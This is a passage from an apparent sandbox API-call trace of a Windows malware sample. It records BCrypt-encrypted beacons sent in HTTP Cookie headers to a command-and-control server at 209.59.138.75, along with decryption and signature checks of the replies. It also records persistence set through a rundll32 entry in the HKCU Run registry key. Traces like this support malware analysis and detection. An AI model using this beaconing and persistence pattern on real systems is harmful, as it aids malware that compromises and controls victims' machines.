pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0653.119] GetProcessHeap () returned 0x530000 [0653.119] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a763b8 [0653.119] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a763b8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a763b8, pcbResult=0x2cf4b4) returned 0x0 [0653.119] GetProcessHeap () returned 0x530000 [0653.119] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xda) returned 0x2aa0b28 [0653.121] GetProcessHeap () returned 0x530000 [0653.121] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a763b8 | out: hHeap=0x530000) returned 1 [0653.121] GetProcessHeap () returned 0x530000 [0653.121] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0653.121] CryptBinaryToStringW (in: pbBinary=0x2aa0b28, cbBinary=0xda, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0653.122] GetProcessHeap () returned 0x530000 [0653.122] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24a) returned 0x2b65430 [0653.122] CryptBinaryToStringW (in: pbBinary=0x2aa0b28, cbBinary=0xda, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgBPh7qartDj+WV75bsOTBkSDPQJgBgPW3pBC7x2kSwbBZBxtGjCGIOqeXhUTXnKMBO5b8N1p4A2URw=", pcchString=0x2cf504) returned 1 [0653.122] GetProcessHeap () returned 0x530000 [0653.122] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0653.122] GetProcessHeap () returned 0x530000 [0653.122] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63030 [0653.122] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: fWvatzoHz=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgBPh7qartDj+WV75bsOTBkSDPQJgBgPW3pBC7x2kSwbBZBxtGjCGIOqeXhUTXnKMBO5b8N1p4A2URw=\r\n") returned 312 [0653.122] GetProcessHeap () returned 0x530000 [0653.122] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63030 | out: hHeap=0x530000) returned 1 [0653.122] GetProcessHeap () returned 0x530000 [0653.123] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0653.123] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0653.124] GetProcessHeap () returned 0x530000 [0653.124] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0653.124] InternetConnectW (hInternet=0xcc0004, lpszServerName="209.59.138.75", nServerPort=0x1ba8, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0653.124] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="uGgpKquXhAwYVUnpJNczDqWIgfQfpTUP", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0653.125] GetProcessHeap () returned 0x530000 [0653.125] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0653.125] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0653.125] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0653.125] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0653.125] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: fWvatzoHz=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgBPh7qartDj+WV75bsOTBkSDPQJgBgPW3pBC7x2kSwbBZBxtGjCGIOqeXhUTXnKMBO5b8N1p4A2URw=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0654.192] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0654.192] GetProcessHeap () returned 0x530000 [0654.192] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0654.193] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x1f7) returned 1 [0654.193] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47ff7, dwNumberOfBytesToRead=0xfe09, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47ff7*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0654.193] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0654.193] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0654.193] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0654.194] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0654.194] GetProcessHeap () returned 0x530000 [0654.194] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0654.194] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0654.194] GetProcessHeap () returned 0x530000 [0654.194] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0654.194] GetProcessHeap () returned 0x530000 [0654.194] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0654.194] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0654.195] GetProcessHeap () returned 0x530000 [0654.195] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0654.195] GetProcessHeap () returned 0x530000 [0654.195] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0654.195] GetProcessHeap () returned 0x530000 [0654.195] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630a8 [0654.195] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0654.195] GetProcessHeap () returned 0x530000 [0654.195] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630a8 | out: hHeap=0x530000) returned 1 [0654.196] GetProcessHeap () returned 0x530000 [0654.196] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0654.196] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0654.196] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0654.196] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0654.196] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0654.196] GetProcessHeap () returned 0x530000 [0654.196] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0654.196] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0654.196] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0654.199] GetProcessHeap () returned 0x530000 [0654.199] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c750 [0654.200] GetProcessHeap () returned 0x530000 [0654.201] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0654.201] GetProcessHeap () returned 0x530000 [0654.201] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0654.201] GetProcessHeap () returned 0x530000 [0654.202] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa0b28 | out: hHeap=0x530000) returned 1 [0654.202] GetProcessHeap () returned 0x530000 [0654.202] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0654.202] GetProcessHeap () returned 0x530000 [0654.202] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0654.202] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0654.203] GetProcessHeap () returned 0x530000 [0654.203] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83be0 [0654.203] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YPPwAbfyWPxnF") returned 103 [0654.203] GetProcessHeap () returned 0x530000 [0654.203] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83be0 | out: hHeap=0x530000) returned 1 [0654.203] GetProcessHeap () returned 0x530000 [0654.203] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0654.203] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x684, lpdwDisposition=0x0) returned 0x0 [0654.204] GetProcessHeap () returned 0x530000 [0654.204] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0654.204] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YPPwAbfyWPxnF") returned 103 [0654.204] RegSetValueExW (in: hKey=0x684, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YPPwAbfyWPxnF", cbData=0xd0 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",YPPwAbfyWPxnF") returned 0x0 [0654.206] RegCloseKey (hKey=0x684) returned 0x0 [0654.206] GetProcessHeap () returned 0x530000 [0654.206] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c750 | out: hHeap=0x530000) returned 1 [0654.206] GetProcessHeap () returned 0x530000 [0654.207] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0654.207] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe2f3e) returned 0x102 [0664.267] GetProcessHeap () returned 0x530000 [0664.267] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0664.268] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0664.268] GetProcessHeap () returned 0x530000 [0664.268] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0664.268] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0664.268] GetProcessHeap () returned 0x530000 [0664.268] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0664.268] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0664.268] GetProcessHeap () returned 0x530000 [0664.268] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0664.268] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0664.271] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0664.271] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0664.271] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0664.271] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0664.271] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0664.271] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0664.272] GetProcessHeap () returned 0x530000 [0664.272] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0664.274] GetProcessHeap () returned 0x530000 [0664.274] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0664.274] GetProcessHeap () returned 0x530000 [0664.274] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cce68 [0664.274] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0664.275] GetProcessHeap () returned 0x530000 [0664.275] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0664.275] GetProcessHeap () returned 0x530000 [0664.276] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cce68 | out: hHeap=0x530000) returned 1 [0664.276] GetProcessHeap () returned 0x530000 [0664.276] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630a8 [0664.276] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0664.276] GetProcessHeap () returned 0x530000 [0664.277] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630a8 | out: hHeap=0x530000) returned 1 [0664.277] GetProcessHeap () returned 0x530000 [0664.277] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0664.277] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0664.277] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0664.277] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0664.277] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0664.277] GetProcessHeap () returned 0x530000 [0664.277] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0664.277] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0664.277] GetProcessHeap () returned 0x530000 [0664.277] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0664.279] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0664.279] GetProcessHeap () returned 0x530000 [0664.279] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a763b8 [0664.280] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a763b8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a763b8, pcbResult=0x2cf4b4) returned 0x0 [0664.280] GetProcessHeap () returned 0x530000 [0664.280] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xc0) returned 0x5fafd0 [0664.281] GetProcessHeap () returned 0x530000 [0664.282] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a763b8 | out: hHeap=0x530000) returned 1 [0664.282] GetProcessHeap () returned 0x530000 [0664.282] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0664.282] CryptBinaryToStringW (in: pbBinary=0x5fafd0, cbBinary=0xc0, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0664.282] GetProcessHeap () returned 0x530000 [0664.282] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x202) returned 0x2b65430 [0664.282] CryptBinaryToStringW (in: pbBinary=0x5fafd0, cbBinary=0xc0, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTuco259xUk+4yiybAMY7n2FKsv/zETG7xWtXFRZMpUvJ", pcchString=0x2cf504) returned 1 [0664.283] GetProcessHeap () returned 0x530000 [0664.283] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0664.283] GetProcessHeap () returned 0x530000 [0664.283] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63120 [0664.283] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: yC=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTuco259xUk+4yiybAMY7n2FKsv/zETG7xWtXFRZMpUvJ\r\n") returned 269 [0664.283] GetProcessHeap () returned 0x530000 [0664.283] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63120 | out: hHeap=0x530000) returned 1 [0664.284] GetProcessHeap () returned 0x530000 [0664.284] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0664.284] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0664.284] GetProcessHeap () returned 0x530000 [0664.284] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0664.284] InternetConnectW (hInternet=0xcc0004, lpszServerName="209.59.138.75", nServerPort=0x1ba8, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0664.286] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="OpDIaUbKbVKthFMeufGDyGNIcFlhcBgfRArWebvvHgyyNwCcPFJL", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0664.287] GetProcessHeap () returned 0x530000 [0664.287] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0664.287] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0664.287] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0664.287] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0664.287] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: yC=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTuco259xUk+4yiybAMY7n2FKsv/zETG7xWtXFRZMpUvJ\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0665.362] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0665.362] GetProcessHeap () returned 0x530000 [0665.362] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0665.362] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x390) returned 1 [0665.363] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48190, dwNumberOfBytesToRead=0xfc70, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48190*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0665.363] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0665.365] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0665.365] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0665.365] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0665.365] GetProcessHeap () returned 0x530000 [0665.365] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, 